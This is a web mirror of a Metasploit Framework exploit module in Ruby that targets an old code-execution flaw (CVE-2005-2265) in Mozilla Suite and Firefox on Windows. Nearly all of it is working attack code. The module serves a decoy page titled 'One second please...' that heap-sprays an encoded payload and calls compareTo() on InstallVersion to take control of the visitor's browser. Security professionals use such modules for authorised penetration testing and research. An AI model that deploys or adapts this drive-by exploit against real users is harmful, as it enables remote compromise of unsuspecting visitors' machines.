CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/mozilla_compareto.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  #include Msf::Exploit::Remote::BrowserAutopwn

15
  # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10

16
  # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.

17
  #autopwn_info({

18
  #  :ua_name => HttpClients::FF,

19
  #  :ua_minver => "1.0",

20
  #  :ua_maxver => "1.7.10",

21
  #  :os_name => OperatingSystems::Match::WINDOWS,

22
  #  :javascript => true,

23
  #  :rank => NormalRanking, # reliable memory corruption

24
  #  :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",

25
  #})

26


27
  def initialize(info = {})

28
    super(update_info(info,

29
      'Name'           => 'Mozilla Suite/Firefox compareTo() Code Execution',

30
      'Description'    => %q{

31
          This module exploits a code execution vulnerability in the Mozilla

32
        Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit

33
        module is a direct port of Aviv Raff's HTML PoC.

34
      },

35
      'License'        => MSF_LICENSE,

36
      'Author'         =>  ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],

37
      'References'     =>

38
        [

39
          ['CVE',    '2005-2265'],

40
          ['OSVDB',  '17968'],

41
          ['BID',    '14242'],

42
          ['URL',    'http://www.mozilla.org/security/announce/mfsa2005-50.html'],

43
        ],

44
      'Payload'        =>

45
        {

46
          'Space'    => 400,

47
          'BadChars' => "\x00",

48
        },

49
      'Platform'       => %w{ win },

50
      'Targets'        =>

51
        [

52
          # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on

53
          # WinXP-SP3 and Win2kAS-SP0

54
          [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',

55
            {

56
              'Platform' => 'win',

57
              'Arch' => ARCH_X86,

58
              'Ret' => 0x0c0c0c0c,

59
            }

60
          ],

61
        ],

62
      'DefaultTarget'  => 0,

63
      'DisclosureDate' => '2005-07-13'

64
      ))

65
  end

66


67
  def on_request_uri(cli, request)

68


69
    # Re-generate the payload

70
    return if ((p = regenerate_payload(cli)) == nil)

71


72
    print_status("Sending #{self.name}")

73
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

74


75
    # Handle the payload

76
    handler(cli)

77
  end

78


79
  def generate_html(payload)

80


81
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

82
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

83


84
    spray_to = sprintf("0x%.8x", target.ret)

85
    spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )

86
    spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )

87
    eax_address = sprintf("0x%.8x", target.ret)

88


89
    return %Q|

90
<html>

91
<head>

92
<!--

93
  Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)

94
  From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx

95
  Greets: SkyLined, The Insider and shutdown

96
-->

97
  <title>One second please...</title>

98
  <script language="javascript">

99


100
    function BodyOnLoad()

101
    {

102
      location.href="javascript:void (new InstallVersion());";

103
      CrashAndBurn();

104
    };

105


106
    #{js_heap_spray}

107
    // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology

108
    function CrashAndBurn()

109
    {

110
      // Payload - Just return..

111
      var payLoadCode=unescape("#{enc_code}");

112


113
      // Size of the heap blocks

114
      var heapBlockSize=0x400000;

115
      sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));

116


117
      // Set address to fake "pdata".

118
      var eaxAddress = #{eax_address};

119


120
      //	This was taken from shutdown's PoC in bugzilla

121
      // struct vtbl { void (*code)(void); };

122
      // struct data { struct vtbl *pvtbl; };

123
      //

124
      // struct data *pdata = (struct data *)(xxAddress & ~0x01);

125
      // pdata->pvtbl->code(pdata);

126
      //

127
      (new InstallVersion).compareTo(new Number(eaxAddress >> 1));

128
    }

129
// -->

130
  </script>

131
</head>

132
<body onload="BodyOnLoad()">

133
</body>

134
</html>

135
    |

136
  end

137
end

138


139